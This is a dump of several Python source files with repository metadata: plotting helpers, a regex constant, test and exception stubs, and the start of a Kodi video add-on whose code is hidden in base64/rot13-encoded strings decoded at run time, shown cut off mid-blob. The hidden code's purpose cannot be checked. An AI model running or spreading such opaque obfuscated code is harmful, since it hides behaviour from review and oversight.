constants.py

zaro0508/sceptre-provisioner-hooks

1574f5587453a664f5441c385f757da2343f02b4

[ "Apache-2.0" ]

null

constants.py

zaro0508/sceptre-provisioner-hooks

1574f5587453a664f5441c385f757da2343f02b4

[ "Apache-2.0" ]

1

2019-09-11T01:24:42.000Z

2019-09-11T01:25:33.000Z

constants.py

zaro0508/sceptre-provisioner-hooks

1574f5587453a664f5441c385f757da2343f02b4

[ "Apache-2.0" ]

2

2019-01-27T06:35:49.000Z

2019-04-16T17:01:33.000Z

# -*- coding: utf-8 -*- EMAIL_REGEX = r'\b[a-zA-Z0-9._%+-]+@[a-zA-Z0-9.-]+\.[a-zA-Z]{2,4}\b'

23.5

68

0.457447

21

94

1.952381

0.666667

0.219512

0.243902

0.292683

0.365854

0

0.082353

0.095745

94

3

69

31.333333

0.4

0.223404

0

1

0.71831

0

1

0

false

0

1

0

1

null

1

0

1

0

1

0

1

null

0

10

3b496f3380807f4aaf9d40b2b52b7520641be9f6

85

py

Python

test/helpers/__init__.py

silverfernsys/jsonschemaplus

5553d613eeee447b3edbeec85ed31ad9ce8a108a

[ "BSD-4-Clause" ]

1

2017-03-02T08:55:47.000Z

test/helpers/__init__.py

silverfernsys/jsonschemaplus

5553d613eeee447b3edbeec85ed31ad9ce8a108a

[ "BSD-4-Clause" ]

null

test/helpers/__init__.py

silverfernsys/jsonschemaplus

5553d613eeee447b3edbeec85ed31ad9ce8a108a

[ "BSD-4-Clause" ]

null

try: from path import path, paths except: from test.helpers.path import path, paths

21.25

42

0.776471

14

85

4.714286

0.571429

0.30303

0.424242

0.575758

0

0.152941

85

4

42

21.25

0.916667

0

1

0

true

0

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0

0.5

0

1

0

null

1

0

1

0

null

0

1

0

1

0

7

3b4fc1298533a6ca33c38127eee01e0e315c1ce2

154

py

Python

jivago/wsgi/invocation/incorrect_attribute_type_exception.py

keotl/jivago

892dfb0cae773e36245083c3e56f0f8523145523

[ "MIT" ]

12

2018-03-19T20:57:44.000Z

2020-01-27T14:11:24.000Z

jivago/wsgi/invocation/incorrect_attribute_type_exception.py

keotl/jivago

892dfb0cae773e36245083c3e56f0f8523145523

[ "MIT" ]

73

2018-04-20T22:26:00.000Z

2021-12-01T14:17:37.000Z

jivago/wsgi/invocation/incorrect_attribute_type_exception.py

keotl/jivago

892dfb0cae773e36245083c3e56f0f8523145523

[ "MIT" ]

1

2019-02-28T13:33:45.000Z

from jivago.serialization.serialization_exception import SerializationException class IncorrectAttributeTypeException(SerializationException): pass

25.666667

79

0.883117

11

154

12.272727

0.818182

0

0.084416

154

5

80

30.8

0.957447

0

1

0

true

0.333333

0

0.666667

0

1

0

1

null

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1

0

null

0

1

0

1

0

7

3b620f6a70d5a8b80052e5bfebe1fa742b978dcd

23,973

py

Python

toopazo_tools/matplotlib.py

toopazo/toopazo_tools

a713a582628bfd966490bc67061fe34cc2353ba1

[ "MIT" ]

null

toopazo_tools/matplotlib.py

toopazo/toopazo_tools

a713a582628bfd966490bc67061fe34cc2353ba1

[ "MIT" ]

null

toopazo_tools/matplotlib.py

toopazo/toopazo_tools

a713a582628bfd966490bc67061fe34cc2353ba1

[ "MIT" ]

null

#!/usr/bin/env python # from toopazo_tools.file_folder import FileFolderTools import matplotlib.pyplot as plt # import numpy as np class FigureTools: def __init__(self): pass @staticmethod def create_fig_axes(a, b): # fig, (ax0, ax1, ax2) = plt.subplots(a, b, figsize=[7, 4]) # ax_arr = [ax0, ax1, ax2] fig, ax_arr = plt.subplots(a, b, figsize=[8, 5]) if (a == 1) and (b == 1): ax_arr = [ax_arr] return [fig, ax_arr] @staticmethod def savefig(filename, closefig): # plt.show() # plt.draw() # # Make fig the current figure # assert isinstance(fig, plt.figure()) # plt.figure(fig.number) # Save and close current figure # fname = FileFolderTools.get_file_basename(filename) fname = filename print('[savefig] Saving %s' % fname) plt.savefig(filename, bbox_inches='tight') if closefig: plt.clf() plt.close() class PlotTools: def __init__(self): pass # @staticmethod # def testfnct(*args, **kwargs): # cnt = 0 # for item in args: # print('cnt %s, item %s' % (cnt, item)) # cnt = cnt + 1 # # for key, value in kwargs.items(): # print('kwargs[%s] = %s' % (key, value)) # @staticmethod # def add_vline(ax, x0, y0, ax_ylims, **kwargs): # plt.sca(ax) # plt.vlines(x=x0, ymin=ax_ylims[0], ymax= ax_ylims[1], **kwargs) # # colors='k', linestyles='dashed', label='') # # @staticmethod # def add_text(x0, y0, arg, **kwargs): # plt.text(x0, y0, arg, **kwargs) # # fontsize = 12, color = 'black' @staticmethod def auto_lims(ax_arr, y_arr): # ymin = np.min(y_arr) # if ymin > 0: # ylower = 0.8 * ymin # else: # ylower = 1.2 * ymin # # ymax = np.max(y_arr) # if ymax > 0: # yupper = 1.2 * ymax # else: # yupper = 0.8 * ymax # # ax.set_ylim([ylower, yupper]) _ = y_arr ax_arr[0].locator_params(axis='y', nbins=3) ax_arr[0].locator_params(axis='x', nbins=4) @staticmethod def ax1_x1_y8(ax_arr, x_arr, xlabel_arr, y_arr, ylabel_arr): # ax.hold(True) ax_arr[0].grid(True) ax_arr[0].plot(x_arr[0], y_arr[0], color='red') ax_arr[0].plot(x_arr[0], y_arr[1], color='green') ax_arr[0].plot(x_arr[0], y_arr[2], color='blue') ax_arr[0].plot(x_arr[0], y_arr[3], color='black') ax_arr[0].plot(x_arr[0], y_arr[4], color='green', linestyle='dashed') ax_arr[0].plot(x_arr[0], y_arr[5], color='red', linestyle='dashed') ax_arr[0].plot(x_arr[0], y_arr[6], color='black', linestyle='dashed') ax_arr[0].plot(x_arr[0], y_arr[7], color='blue', linestyle='dashed') ax_arr[0].set(xlabel=xlabel_arr[0], ylabel=ylabel_arr[0]) # ax.ticklabel_format(useOffset=False) # I was getting the error # "This method only works with the ScalarFormatter.") # AttributeError: This method only works with the ScalarFormatter. # PlotTools.auto_lims(ax_arr, y_arr) ax_arr[0].locator_params(axis='y', nbins=3) ax_arr[0].locator_params(axis='x', nbins=4) @staticmethod def ax1_x1_y1(ax_arr, x_arr, xlabel_arr, y_arr, ylabel_arr): # ax.hold(True) ax_arr[0].grid(True) ax_arr[0].plot(x_arr[0], y_arr[0], color='red') ax_arr[0].set(xlabel=xlabel_arr[0], ylabel=ylabel_arr[0]) ax_arr[0].ticklabel_format(useOffset=False) # PlotTools.auto_lims(ax_arr, y_arr) ax_arr[0].locator_params(axis='y', nbins=3) ax_arr[0].locator_params(axis='x', nbins=4) @staticmethod def ax1_x1_y2(ax, x, xlabel, y_arr, ylabel): ax = ax[0] # for consistency with create_fig_axes # ax.hold(True) ax.grid(True) ax.plot(x, y_arr[0], color='red') ax.plot(x, y_arr[1], color='green') # ax.plot(x, y_arr[2], color='blue') ax.set(xlabel=xlabel, ylabel=ylabel) ax.ticklabel_format(useOffset=False) # UlgPlotFigures.auto_lims(ax, y_arr) ax.locator_params(axis='y', nbins=3) ax.locator_params(axis='x', nbins=4) @staticmethod def ax1_x2_y2(ax_arr, x_arr, xlabel_arr, y_arr, ylabel_arr): # ax.hold(True) ax_arr[0].grid(True) ax_arr[0].plot(x_arr[0], y_arr[0], color='red') ax_arr[0].plot(x_arr[1], y_arr[1], color='green') ax_arr[0].set(xlabel=xlabel_arr[0], ylabel=ylabel_arr[0]) ax_arr[0].ticklabel_format(useOffset=False) # PlotTools.auto_lims(ax_arr, y_arr) ax_arr[0].locator_params(axis='y', nbins=3) ax_arr[0].locator_params(axis='x', nbins=4) @staticmethod def ax1_x2_y2_twinx(ax_arr, x_arr, xlabel_arr, y_arr, ylabel_arr): color = 'red' ax_arr[0].grid(True) ax_arr[0].set_xlabel(xlabel_arr[0]) ax_arr[0].set_ylabel(ylabel_arr[0], color=color) ax_arr[0].plot(x_arr[0], y_arr[0], color=color) ax_arr[0].tick_params(axis='y', labelcolor=color) # instantiate a second axes that shares the same x-axis ax2 = ax_arr[0].twinx() # we already handled the x-label with ax1 color = 'green' ax2.grid(True) ax2.set_ylabel(ylabel_arr[1], color=color) ax2.plot(x_arr[1], y_arr[1], color=color) ax2.tick_params(axis='y', labelcolor=color) @staticmethod def ax1_x3_y3(ax_arr, x_arr, xlabel_arr, y_arr, ylabel_arr): # ax.hold(True) ax_arr[0].grid(True) ax_arr[0].plot(x_arr[0], y_arr[0], color='red') ax_arr[0].plot(x_arr[1], y_arr[1], color='green') ax_arr[0].plot(x_arr[2], y_arr[2], color='blue') ax_arr[0].set(xlabel=xlabel_arr[0], ylabel=ylabel_arr[0]) ax_arr[0].ticklabel_format(useOffset=False) # PlotTools.auto_lims(ax_arr, y_arr) ax_arr[0].locator_params(axis='y', nbins=3) ax_arr[0].locator_params(axis='x', nbins=4) @staticmethod def ax1_x4_y4(ax_arr, x_arr, xlabel_arr, y_arr, ylabel_arr): # ax.hold(True) ax_arr[0].grid(True) ax_arr[0].plot(x_arr[0], y_arr[0], color='red') ax_arr[0].plot(x_arr[1], y_arr[1], color='green') ax_arr[0].plot(x_arr[2], y_arr[2], color='blue') ax_arr[0].plot(x_arr[3], y_arr[3], color='black') ax_arr[0].set(xlabel=xlabel_arr[0], ylabel=ylabel_arr[0]) ax_arr[0].ticklabel_format(useOffset=False) # PlotTools.auto_lims(ax_arr, y_arr) ax_arr[0].locator_params(axis='y', nbins=3) ax_arr[0].locator_params(axis='x', nbins=4) @staticmethod def ax1_x1_y4(ax_arr, x_arr, xlabel_arr, y_arr, ylabel_arr): # ax.hold(True) ax_arr[0].grid(True) ax_arr[0].plot(x_arr[0], y_arr[0], color='red') ax_arr[0].plot(x_arr[0], y_arr[1], color='green') ax_arr[0].plot(x_arr[0], y_arr[2], color='blue') ax_arr[0].plot(x_arr[0], y_arr[3], color='black') ax_arr[0].set(xlabel=xlabel_arr[0], ylabel=ylabel_arr[0]) ax_arr[0].ticklabel_format(useOffset=False) # PlotTools.auto_lims(ax_arr, y_arr) ax_arr[0].locator_params(axis='y', nbins=3) ax_arr[0].locator_params(axis='x', nbins=4) @staticmethod def ax1_x1_y3(ax_arr, x_arr, xlabel_arr, y_arr, ylabel_arr): # ax.hold(True) ax_arr[0].grid(True) ax_arr[0].plot(x_arr[0], y_arr[0], color='red') ax_arr[0].plot(x_arr[0], y_arr[1], color='green') ax_arr[0].plot(x_arr[0], y_arr[2], color='blue') ax_arr[0].set(xlabel=xlabel_arr[0], ylabel=ylabel_arr[0]) ax_arr[0].ticklabel_format(useOffset=False) # PlotTools.auto_lims(ax_arr, y_arr) ax_arr[0].locator_params(axis='y', nbins=3) ax_arr[0].locator_params(axis='x', nbins=4) @staticmethod def ax2_x2_y2(ax_arr, x_arr, xlabel_arr, y_arr, ylabel_arr): # ax_arr[0].hold(True) ax_arr[0].grid(True) ax_arr[0].plot(x_arr[0], y_arr[0], color='red') ax_arr[0].set(xlabel=xlabel_arr[0], ylabel=ylabel_arr[0]) # PlotTools.auto_lims(ax_arr[0], y_arr[0]) ax_arr[0].locator_params(axis='y', nbins=3) ax_arr[0].locator_params(axis='x', nbins=4) # ax_arr[1].hold(True) ax_arr[1].grid(True) ax_arr[1].plot(x_arr[1], y_arr[1], color='red') ax_arr[1].set(xlabel=xlabel_arr[1], ylabel=ylabel_arr[1]) # PlotTools.auto_lims(ax_arr[1], y_arr[1]) ax_arr[1].locator_params(axis='y', nbins=3) ax_arr[1].locator_params(axis='x', nbins=4) @staticmethod def ax3_x1_y3(ax_arr, x_arr, xlabel_arr, y_arr, ylabel_arr): # ax_arr[0].hold(True) ax_arr[0].grid(True) ax_arr[0].plot(x_arr[0], y_arr[0], color='red') ax_arr[0].set(xlabel=xlabel_arr[0], ylabel=ylabel_arr[0]) # PlotTools.auto_lims(ax_arr[0], y_arr[0]) ax_arr[0].locator_params(axis='y', nbins=3) ax_arr[0].locator_params(axis='x', nbins=4) # ax_arr[1].hold(True) ax_arr[1].grid(True) ax_arr[1].plot(x_arr[0], y_arr[1], color='red') ax_arr[1].set(xlabel=xlabel_arr[0], ylabel=ylabel_arr[1]) # PlotTools.auto_lims(ax_arr[1], y_arr[1]) ax_arr[1].locator_params(axis='y', nbins=3) ax_arr[1].locator_params(axis='x', nbins=4) # ax_arr[2].hold(True) ax_arr[2].grid(True) ax_arr[2].plot(x_arr[0], y_arr[2], color='red') ax_arr[2].set(xlabel=xlabel_arr[0], ylabel=ylabel_arr[2]) # PlotTools.auto_lims(ax_arr[2], y_arr[2]) ax_arr[2].locator_params(axis='y', nbins=3) ax_arr[2].locator_params(axis='x', nbins=4) @staticmethod def ax3_x1_y6(ax_arr, x_arr, xlabel_arr, y_arr, ylabel_arr): # ax_arr[0].hold(True) ax_arr[0].grid(True) ax_arr[0].plot(x_arr[0], y_arr[0], color='red') ax_arr[0].plot(x_arr[0], y_arr[3], color='green') ax_arr[0].set(xlabel=xlabel_arr[0], ylabel=ylabel_arr[0]) # PlotTools.auto_lims(ax_arr[0], y_arr[0]) ax_arr[0].locator_params(axis='y', nbins=3) ax_arr[0].locator_params(axis='x', nbins=4) # ax_arr[1].hold(True) ax_arr[1].grid(True) ax_arr[1].plot(x_arr[0], y_arr[1], color='red') ax_arr[1].plot(x_arr[0], y_arr[4], color='green') ax_arr[1].set(xlabel=xlabel_arr[0], ylabel=ylabel_arr[1]) # PlotTools.auto_lims(ax_arr[1], y_arr[1]) ax_arr[1].locator_params(axis='y', nbins=3) ax_arr[1].locator_params(axis='x', nbins=4) # ax_arr[2].hold(True) ax_arr[2].grid(True) ax_arr[2].plot(x_arr[0], y_arr[2], color='red') ax_arr[2].plot(x_arr[0], y_arr[5], color='green') ax_arr[2].set(xlabel=xlabel_arr[0], ylabel=ylabel_arr[2]) # PlotTools.auto_lims(ax_arr[2], y_arr[2]) ax_arr[2].locator_params(axis='y', nbins=3) ax_arr[2].locator_params(axis='x', nbins=4) @staticmethod def ax4_x1_y4(ax_arr, x_arr, xlabel_arr, y_arr, ylabel_arr): # ax_arr[0].hold(True) ax_arr[0].grid(True) ax_arr[0].plot(x_arr[0], y_arr[0], color='red') ax_arr[0].set(xlabel=xlabel_arr[0], ylabel=ylabel_arr[0]) # PlotTools.auto_lims(ax_arr[0], y_arr[0]) ax_arr[0].locator_params(axis='y', nbins=3) ax_arr[0].locator_params(axis='x', nbins=4) # ax_arr[1].hold(True) ax_arr[1].grid(True) ax_arr[1].plot(x_arr[0], y_arr[1], color='red') ax_arr[1].set(xlabel=xlabel_arr[0], ylabel=ylabel_arr[1]) # PlotTools.auto_lims(ax_arr[1], y_arr[1]) ax_arr[1].locator_params(axis='y', nbins=3) ax_arr[1].locator_params(axis='x', nbins=4) # ax_arr[2].hold(True) ax_arr[2].grid(True) ax_arr[2].plot(x_arr[0], y_arr[2], color='red') ax_arr[2].set(xlabel=xlabel_arr[0], ylabel=ylabel_arr[2]) # PlotTools.auto_lims(ax_arr[2], y_arr[2]) ax_arr[2].locator_params(axis='y', nbins=3) ax_arr[2].locator_params(axis='x', nbins=4) # ax_arr[3].hold(True) ax_arr[3].grid(True) ax_arr[3].plot(x_arr[0], y_arr[3], color='red') ax_arr[3].set(xlabel=xlabel_arr[0], ylabel=ylabel_arr[3]) # PlotTools.auto_lims(ax_arr[3], y_arr[3]) ax_arr[3].locator_params(axis='y', nbins=3) ax_arr[3].locator_params(axis='x', nbins=4) @staticmethod def ax4_x1_y8(ax_arr, x_arr, xlabel_arr, y_arr, ylabel_arr): # ax_arr[0].hold(True) ax_arr[0].grid(True) ax_arr[0].plot(x_arr[0], y_arr[0], color='red') ax_arr[0].plot(x_arr[0], y_arr[4], color='green') ax_arr[0].set(xlabel=xlabel_arr[0], ylabel=ylabel_arr[0]) # PlotTools.auto_lims(ax_arr[0], y_arr[0]) ax_arr[0].locator_params(axis='y', nbins=3) ax_arr[0].locator_params(axis='x', nbins=4) # ax_arr[1].hold(True) ax_arr[1].grid(True) ax_arr[1].plot(x_arr[0], y_arr[1], color='red') ax_arr[1].plot(x_arr[0], y_arr[5], color='green') ax_arr[1].set(xlabel=xlabel_arr[0], ylabel=ylabel_arr[1]) # PlotTools.auto_lims(ax_arr[1], y_arr[1]) ax_arr[1].locator_params(axis='y', nbins=3) ax_arr[1].locator_params(axis='x', nbins=4) # ax_arr[2].hold(True) ax_arr[2].grid(True) ax_arr[2].plot(x_arr[0], y_arr[2], color='red') ax_arr[2].plot(x_arr[0], y_arr[6], color='green') ax_arr[2].set(xlabel=xlabel_arr[0], ylabel=ylabel_arr[2]) # PlotTools.auto_lims(ax_arr[2], y_arr[2]) ax_arr[2].locator_params(axis='y', nbins=3) ax_arr[2].locator_params(axis='x', nbins=4) # ax_arr[3].hold(True) ax_arr[3].grid(True) ax_arr[3].plot(x_arr[0], y_arr[3], color='red') ax_arr[3].plot(x_arr[0], y_arr[7], color='green') ax_arr[3].set(xlabel=xlabel_arr[0], ylabel=ylabel_arr[3]) # PlotTools.auto_lims(ax_arr[3], y_arr[3]) ax_arr[3].locator_params(axis='y', nbins=3) ax_arr[3].locator_params(axis='x', nbins=4) class ScatterTools: def __init__(self): pass @staticmethod def auto_lims(ax_arr, y_arr): # ymin = np.min(y_arr) # if ymin > 0: # ylower = 0.8 * ymin # else: # ylower = 1.2 * ymin # # ymax = np.max(y_arr) # if ymax > 0: # yupper = 1.2 * ymax # else: # yupper = 0.8 * ymax # # ax.set_ylim([ylower, yupper]) _ = y_arr ax_arr[0].locator_params(axis='y', nbins=3) ax_arr[0].locator_params(axis='x', nbins=4) @staticmethod def ax1_x1_y8(ax_arr, x_arr, xlabel_arr, y_arr, ylabel_arr): # ax.hold(True) ax_arr[0].grid(True) ax_arr[0].scatter(x_arr[0], y_arr[0], color='red') ax_arr[0].scatter(x_arr[0], y_arr[1], color='green') ax_arr[0].scatter(x_arr[0], y_arr[2], color='blue') ax_arr[0].scatter(x_arr[0], y_arr[3], color='black') ax_arr[0].scatter(x_arr[0], y_arr[4], color='green', linestyle='dashed') ax_arr[0].scatter(x_arr[0], y_arr[5], color='red', linestyle='dashed') ax_arr[0].scatter(x_arr[0], y_arr[6], color='black', linestyle='dashed') ax_arr[0].scatter(x_arr[0], y_arr[7], color='blue', linestyle='dashed') ax_arr[0].set(xlabel=xlabel_arr[0], ylabel=ylabel_arr[0]) # ax.ticklabel_format(useOffset=False) # I was getting the error # "This method only works with the ScalarFormatter.") # AttributeError: This method only works with the ScalarFormatter. # PlotTools.auto_lims(ax_arr, y_arr) ax_arr[0].locator_params(axis='y', nbins=3) ax_arr[0].locator_params(axis='x', nbins=4) @staticmethod def ax1_x1_y1(ax_arr, x_arr, xlabel_arr, y_arr, ylabel_arr): # ax.hold(True) ax_arr[0].grid(True) ax_arr[0].scatter(x_arr[0], y_arr[0], color='red') ax_arr[0].set(xlabel=xlabel_arr[0], ylabel=ylabel_arr[0]) ax_arr[0].ticklabel_format(useOffset=False) # PlotTools.auto_lims(ax_arr, y_arr) ax_arr[0].locator_params(axis='y', nbins=3) ax_arr[0].locator_params(axis='x', nbins=4) @staticmethod def ax1_x2_y2(ax_arr, x_arr, xlabel_arr, y_arr, ylabel_arr): # ax.hold(True) ax_arr[0].grid(True) ax_arr[0].scatter(x_arr[0], y_arr[0], color='red') ax_arr[0].scatter(x_arr[1], y_arr[1], color='green') ax_arr[0].set(xlabel=xlabel_arr[0], ylabel=ylabel_arr[0]) ax_arr[0].ticklabel_format(useOffset=False) # PlotTools.auto_lims(ax_arr, y_arr) ax_arr[0].locator_params(axis='y', nbins=3) ax_arr[0].locator_params(axis='x', nbins=4) @staticmethod def ax1_x3_y3(ax_arr, x_arr, xlabel_arr, y_arr, ylabel_arr): # ax.hold(True) ax_arr[0].grid(True) ax_arr[0].scatter(x_arr[0], y_arr[0], color='red') ax_arr[0].scatter(x_arr[1], y_arr[1], color='green') ax_arr[0].scatter(x_arr[2], y_arr[2], color='blue') ax_arr[0].set(xlabel=xlabel_arr[0], ylabel=ylabel_arr[0]) ax_arr[0].ticklabel_format(useOffset=False) # PlotTools.auto_lims(ax_arr, y_arr) ax_arr[0].locator_params(axis='y', nbins=3) ax_arr[0].locator_params(axis='x', nbins=4) @staticmethod def ax1_x4_y4(ax_arr, x_arr, xlabel_arr, y_arr, ylabel_arr): # ax.hold(True) ax_arr[0].grid(True) ax_arr[0].scatter(x_arr[0], y_arr[0], color='red') ax_arr[0].scatter(x_arr[1], y_arr[1], color='green') ax_arr[0].scatter(x_arr[2], y_arr[2], color='blue') ax_arr[0].scatter(x_arr[3], y_arr[3], color='black') ax_arr[0].set(xlabel=xlabel_arr[0], ylabel=ylabel_arr[0]) ax_arr[0].ticklabel_format(useOffset=False) # PlotTools.auto_lims(ax_arr, y_arr) ax_arr[0].locator_params(axis='y', nbins=3) ax_arr[0].locator_params(axis='x', nbins=4) @staticmethod def ax1_x1_y4(ax_arr, x_arr, xlabel_arr, y_arr, ylabel_arr): # ax.hold(True) ax_arr[0].grid(True) ax_arr[0].scatter(x_arr[0], y_arr[0], color='red') ax_arr[0].scatter(x_arr[0], y_arr[1], color='green') ax_arr[0].scatter(x_arr[0], y_arr[2], color='blue') ax_arr[0].scatter(x_arr[0], y_arr[3], color='black') ax_arr[0].set(xlabel=xlabel_arr[0], ylabel=ylabel_arr[0]) ax_arr[0].ticklabel_format(useOffset=False) # PlotTools.auto_lims(ax_arr, y_arr) ax_arr[0].locator_params(axis='y', nbins=3) ax_arr[0].locator_params(axis='x', nbins=4) @staticmethod def ax1_x1_y3(ax_arr, x_arr, xlabel_arr, y_arr, ylabel_arr): # ax.hold(True) ax_arr[0].grid(True) ax_arr[0].scatter(x_arr[0], y_arr[0], color='red') ax_arr[0].scatter(x_arr[0], y_arr[1], color='green') ax_arr[0].scatter(x_arr[0], y_arr[2], color='blue') ax_arr[0].set(xlabel=xlabel_arr[0], ylabel=ylabel_arr[0]) ax_arr[0].ticklabel_format(useOffset=False) # PlotTools.auto_lims(ax_arr, y_arr) ax_arr[0].locator_params(axis='y', nbins=3) ax_arr[0].locator_params(axis='x', nbins=4) @staticmethod def ax2_x2_y2(ax_arr, x_arr, xlabel_arr, y_arr, ylabel_arr): # ax_arr[0].hold(True) ax_arr[0].grid(True) ax_arr[0].scatter(x_arr[0], y_arr[0], color='red') ax_arr[0].set(xlabel=xlabel_arr[0], ylabel=ylabel_arr[0]) # PlotTools.auto_lims(ax_arr[0], y_arr[0]) ax_arr[0].locator_params(axis='y', nbins=3) ax_arr[0].locator_params(axis='x', nbins=4) # ax_arr[1].hold(True) ax_arr[1].grid(True) ax_arr[1].scatter(x_arr[1], y_arr[1], color='red') ax_arr[1].set(xlabel=xlabel_arr[1], ylabel=ylabel_arr[1]) # PlotTools.auto_lims(ax_arr[1], y_arr[1]) ax_arr[1].locator_params(axis='y', nbins=3) ax_arr[1].locator_params(axis='x', nbins=4) @staticmethod def ax3_x1_y3(ax_arr, x_arr, xlabel_arr, y_arr, ylabel_arr): # ax_arr[0].hold(True) ax_arr[0].grid(True) ax_arr[0].scatter(x_arr[0], y_arr[0], color='red') ax_arr[0].set(xlabel=xlabel_arr[0], ylabel=ylabel_arr[0]) # PlotTools.auto_lims(ax_arr[0], y_arr[0]) ax_arr[0].locator_params(axis='y', nbins=3) ax_arr[0].locator_params(axis='x', nbins=4) # ax_arr[1].hold(True) ax_arr[1].grid(True) ax_arr[1].scatter(x_arr[0], y_arr[1], color='red') ax_arr[1].set(xlabel=xlabel_arr[0], ylabel=ylabel_arr[1]) # PlotTools.auto_lims(ax_arr[1], y_arr[1]) ax_arr[1].locator_params(axis='y', nbins=3) ax_arr[1].locator_params(axis='x', nbins=4) # ax_arr[2].hold(True) ax_arr[2].grid(True) ax_arr[2].scatter(x_arr[0], y_arr[2], color='red') ax_arr[2].set(xlabel=xlabel_arr[0], ylabel=ylabel_arr[2]) # PlotTools.auto_lims(ax_arr[2], y_arr[2]) ax_arr[2].locator_params(axis='y', nbins=3) ax_arr[2].locator_params(axis='x', nbins=4) @staticmethod def ax3_x1_y6(ax_arr, x_arr, xlabel_arr, y_arr, ylabel_arr): # ax_arr[0].hold(True) ax_arr[0].grid(True) ax_arr[0].scatter(x_arr[0], y_arr[0], color='red') ax_arr[0].scatter(x_arr[0], y_arr[3], color='green') ax_arr[0].set(xlabel=xlabel_arr[0], ylabel=ylabel_arr[0]) # PlotTools.auto_lims(ax_arr[0], y_arr[0]) ax_arr[0].locator_params(axis='y', nbins=3) ax_arr[0].locator_params(axis='x', nbins=4) # ax_arr[1].hold(True) ax_arr[1].grid(True) ax_arr[1].scatter(x_arr[0], y_arr[1], color='red') ax_arr[1].scatter(x_arr[0], y_arr[4], color='green') ax_arr[1].set(xlabel=xlabel_arr[0], ylabel=ylabel_arr[1]) # PlotTools.auto_lims(ax_arr[1], y_arr[1]) ax_arr[1].locator_params(axis='y', nbins=3) ax_arr[1].locator_params(axis='x', nbins=4) # ax_arr[2].hold(True) ax_arr[2].grid(True) ax_arr[2].scatter(x_arr[0], y_arr[2], color='red') ax_arr[2].scatter(x_arr[0], y_arr[5], color='green') ax_arr[2].set(xlabel=xlabel_arr[0], ylabel=ylabel_arr[2]) # PlotTools.auto_lims(ax_arr[2], y_arr[2]) ax_arr[2].locator_params(axis='y', nbins=3) ax_arr[2].locator_params(axis='x', nbins=4) @staticmethod def ax4_x1_y4(ax_arr, x_arr, xlabel_arr, y_arr, ylabel_arr): # ax_arr[0].hold(True) ax_arr[0].grid(True) ax_arr[0].scatter(x_arr[0], y_arr[0], color='red') ax_arr[0].set(xlabel=xlabel_arr[0], ylabel=ylabel_arr[0]) # PlotTools.auto_lims(ax_arr[0], y_arr[0]) ax_arr[0].locator_params(axis='y', nbins=3) ax_arr[0].locator_params(axis='x', nbins=4) # ax_arr[1].hold(True) ax_arr[1].grid(True) ax_arr[1].scatter(x_arr[0], y_arr[1], color='red') ax_arr[1].set(xlabel=xlabel_arr[0], ylabel=ylabel_arr[1]) # PlotTools.auto_lims(ax_arr[1], y_arr[1]) ax_arr[1].locator_params(axis='y', nbins=3) ax_arr[1].locator_params(axis='x', nbins=4) # ax_arr[2].hold(True) ax_arr[2].grid(True) ax_arr[2].scatter(x_arr[0], y_arr[2], color='red') ax_arr[2].set(xlabel=xlabel_arr[0], ylabel=ylabel_arr[2]) # PlotTools.auto_lims(ax_arr[2], y_arr[2]) ax_arr[2].locator_params(axis='y', nbins=3) ax_arr[2].locator_params(axis='x', nbins=4) # ax_arr[3].hold(True) ax_arr[3].grid(True) ax_arr[3].scatter(x_arr[0], y_arr[3], color='red') ax_arr[3].set(xlabel=xlabel_arr[0], ylabel=ylabel_arr[3]) # PlotTools.auto_lims(ax_arr[3], y_arr[3]) ax_arr[3].locator_params(axis='y', nbins=3) ax_arr[3].locator_params(axis='x', nbins=4)

40.494932

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0.89311

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0

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23,973

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false

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0

1

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1

0

null

0

7

8e6f715232d7eed48f17f9d8d0710ae6d72aaa0f

147,737

py

Python

plugin.video.conexao/plugin.video.conexao/default.py

DavidFerreira1243/plugins-kodi_br

74504d548cfadddf2168bf0b8373b2529507c57e

[ "Unlicense" ]

null

plugin.video.conexao/plugin.video.conexao/default.py

DavidFerreira1243/plugins-kodi_br

74504d548cfadddf2168bf0b8373b2529507c57e

[ "Unlicense" ]

null

plugin.video.conexao/plugin.video.conexao/default.py

DavidFerreira1243/plugins-kodi_br

74504d548cfadddf2168bf0b8373b2529507c57e

[ "Unlicense" ]

null

import base64, codecs magic = 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love = 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NtVPNtVPNtVPNtVTMipvOcVTyhVTy0MJ0bW3y0YJEfWlx6PvNtVPNtVPNtVPNtVPNtVPNtVPNtVPNtVTyzVT5iqPOcYaA0pzyhMlN9CFOBo25yBtbtVPNtVPNtVPNtVPNtVPNtVPNtVPNtVPNtVPNtrKExoPN9VTxhp3ElnJ5aVPftWlMgo2EyCGR4WjbtVPNtVPNtVPNtVPNtVPNtVPNtVPNtVPNtVPNtqKWfYzSjpTIhMPu5qTEfXDbWPDxWPDxWPvNtVPNtVPNtVPNtVPNtVPOyoTyzVTkyovucqTIgXPqjqKE1LzHaXFxtCwN6PvNtVPNtVPNtVPNtVPNtVPNtVPNtMz9lVTxtnJ4tnKEyoFtapUI0qJWyWlx6PvNtVPNtVPNtVPNtVPNtVPNtVPNtVPNtVTyzVT5iqPOcYaA0pzyhMlN9CFOBo25yBtbtVPNtVPNtVPNtVPNtVPNtVPNtVPNtVPNtVPNtpUI0qJWyVQ0tW3OfqJqcowbiY3OfqJqcov52nJEyol55o3I0qJWyY3OfLKyfnKA0YlptXlOcYaA0pzyhMlNeVPpiWjbtVPNtVPNtVPNtVPNtVPNtVPNtVPNtVPNtVPNtpTk1M2yhqT9ioUZhLJExK2y0MJ0bPvNtVPNtVPNtVPNtVPNtVPNtVPNtVPNtVPNtVPO0nKEfMFN9VPVgVvNeozSgMFfvVvjXVPNtVPNtVPNtVPNtVPNtVPNtVPNtVPNtVPNtVUIloPN9VUO1qUIvMFjXVPNtVPNtVPNtVPNtVPNtVPNtVPNtVPNtVPNtVUEbqJ1vozScoPN9VTywo24fPvNtVPNtVPNtVPNtVPNtVPNtVPNtVPNtVPNtVPOzo2kxMKVtCFOHpaIyVPxXVPNtVPNtVPNtVPNtVPNtVPNtVPNtVPNtVPNtVUIloP5upUOyozDbpUI0qJWyXDxXPDxWPDxWPDbtVPNtVPNtVPNtVPNtVPNtMJkcMvOfMJ4bnKEyoFtaqKE1LzHaXFxtCwN6PvNtVPNtVPNtVPNtVPNtVPNtVPNtMz9lVTxtnJ4tnKEyoFtaqKE1LzHaXGbXVPNtVPNtVPNtVPNtVPNtVPNtVPNtVPNtnJLtoz90VTxhp3ElnJ5aVQ09VR5iozH6PvNtVPNtVPNtVPNtVPNtVPNtVPNtVPNtVPNtVPOcMvNaVPptnJ4tnF5mqUWcozptBtbtVPNtVPNtVPNtVPNtVPNtVPNtVPNtVPNtVPNtVPNtVUI0q